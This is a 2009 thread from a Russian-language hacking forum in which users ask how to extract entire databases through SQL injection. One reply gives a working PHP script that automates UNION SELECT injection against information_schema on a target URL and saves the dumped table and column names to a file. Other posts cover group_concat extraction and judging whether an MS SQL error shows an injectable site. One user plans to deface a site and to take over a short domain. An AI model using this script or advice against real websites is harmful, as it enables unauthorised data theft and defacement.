ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.04.2009, 18:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
|
|
|
05.04.2009, 22:34
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от .:[melkiy]:.
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
Сам вчера распрашивал знакомых по дному вопросу...
Кароче ответ таков:
Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них:
PHP код:
<?
#Скрипт для перебора значений limit в sql injection
set_time_limit(0);
error_reporting(0);
#В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный "|:" и ":|"
$n="|:"; #начало искомой
$n2=":|"; #конец искомой
$j=0; #парсить с
$lim=0; #до (0 - если до конца)
function get_page($url){ #получение страницы
$link=parse_url($url);
$host = $link['host'];
$src = $link['path'];
$src .= ($link['query'] > "")?"?".$link['query']:"";
$sock = fsockopen ($host, 80);
fputs ($sock, "GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}
for($i=$j;($lim != 0) ? $i<$lim : 1 != 0;$i++){ #получение данных
$url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name,column_name,0x7c),4+from+information_schema.columns+limit+$i,1/*"; #ссылка
$page=get_page($url);
$page=strip_tags($page);
$pos=stripos($page,$n);
$pos2=stripos($page,$n2,($pos+1));
if($pos == ""){echo "\n Current value - $i"; break;}
$page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2)));
$page .="\n";
echo $page;
$r=fopen('out.txt','a+'); #сохранение в файл
fputs($r,$page);
fclose($r);
}
?>
// Вроде бы правила ответа на вопрос не нарушел...
|
|
|
|
05.04.2009, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
.:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
|
|
|
|
05.04.2009, 19:43
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
2 Gorev
А какже group_concat()
я только этим и пользуюсь
|
|
|
|
05.04.2009, 19:48
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от Saiga
2 Gorev
А какже group_concat()
я только этим и пользуюсь
group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
|
|
|
|
05.04.2009, 19:45
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
group_concat выводит, правда не все, а насколько хватит места в поле
|
|
|
|
05.04.2009, 20:20
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще... |
|
|
|
05.04.2009, 23:26
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от Byrger
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...https://forum.antichat.ru/thread30501.html
|
|
|
|
05.04.2009, 20:24
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
возможно  |
|
|
|
05.04.2009, 21:27
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 44
Провел на форуме:
289239
Репутация:
32
|
|
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1208926){kind=avatar}
Похожие темы
Комбинированный вид